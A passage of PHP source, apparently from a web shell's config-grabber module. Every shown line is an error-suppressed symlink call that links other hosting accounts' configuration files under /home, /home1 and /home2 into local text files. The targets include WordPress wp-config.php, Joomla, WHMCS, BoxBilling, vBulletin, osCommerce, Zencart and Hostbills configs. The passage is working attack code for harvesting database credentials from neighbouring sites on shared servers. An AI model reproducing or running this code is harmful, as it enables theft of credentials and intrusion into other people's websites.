1201. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1202. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1203. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1204. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1205. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1206. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1207. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1208. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1209. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1210. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1211. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1212. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1213. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1214. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1215. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1216. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1217. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1218. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1219. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1220. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1221. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1222. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1223. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1224. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1225. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1226. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1227. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1228. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1229. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1230. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1231. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1232. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1233. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1234. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1235. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1236. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1237. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1238. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1239. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1240. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1241. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1242. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1243. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1244. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1245. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1246. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1247. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1248. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1249. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1250. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1251. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1252. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1253. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1254. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1255. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1256. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1257. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1258. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1259. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1260. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1261. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1262. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1263. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1264. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1265. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1266. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1267. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1268. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1269. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1270. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1271. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1272. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1273. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1274. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1275. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1276. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1277. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1278. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1279. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1280. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1281. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1282. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1283. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1284. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1285. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1286. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1287. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1288. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1289.  
1290. //Home1
1291.  
1292. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1293. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1294. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1295. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1296. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1297. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1298. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1299. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1300. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1301. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1302. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1303. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1304. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1305. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1306. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1307. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1308. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1309. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1310. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1311. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1312. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1313. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1314. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1315. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1316. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1317. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1318. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1319. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1320. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1321. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1322. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1323. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1324. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1325. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1326. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1327. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1328. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1329. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1330. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1331. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1332. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1333. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1334. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1335. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1336. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1337. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1338. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1339. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1340. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1341. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1342. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1343. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1344. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1345. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1346. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1347. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1348. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1349. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1350. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1351. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1352. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1353. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1354. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1355. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1356. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1357. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1358. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1359. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1360. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1361. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1362. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1363. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1364. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1365. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1366. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1367. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1368. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1369. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1370. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1371. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1372. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1373. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1374. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1375. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1376. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1377. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1378. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1379. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1380. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1381. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1382. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1383. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1384. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1385. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1386. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1387. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1388. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1389. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1390. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1391. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1392. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1393. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1394. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1395. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1396. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1397. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1398. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1399. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1400. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1401. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1402. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1403. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1404. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1405. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1406. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1407. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1408. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1409. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1410. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1411. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1412. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1413. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1414. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1415. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1416. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1417. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1418. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1419. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1420. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1421. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1422. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1423. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1424. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1425. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1426. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1427. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1428. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1429. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1430. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1431. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1432. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1433. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1434. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1435. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1436. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1437. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1438. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1439. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1440. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1441. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1442. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1443. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1444. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1445. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1446. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1447. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1448. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1449. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1450. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1451. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1452. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1453. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1454. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1455. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1456. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1457. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1458. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1459. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1460. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1461. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1462. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1463. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1464. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1465. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1466. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1467. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1468. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1469. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1470. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1471. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1472.  
1473. //Home2
1474.  
1475. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1476. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1477. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1478. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1479. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1480. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1481. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1482. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1483. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1484. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1485. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1486. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1487. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1488. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1489. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1490. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1491. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1492. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1493. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1494. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1495. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1496. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1497. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1498. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1499. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1500. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1501. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1502. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1503. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1504. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1505. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1506. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1507. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1508. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1509. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1510. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1511. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1512. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1513. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1514. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1515. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1516. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
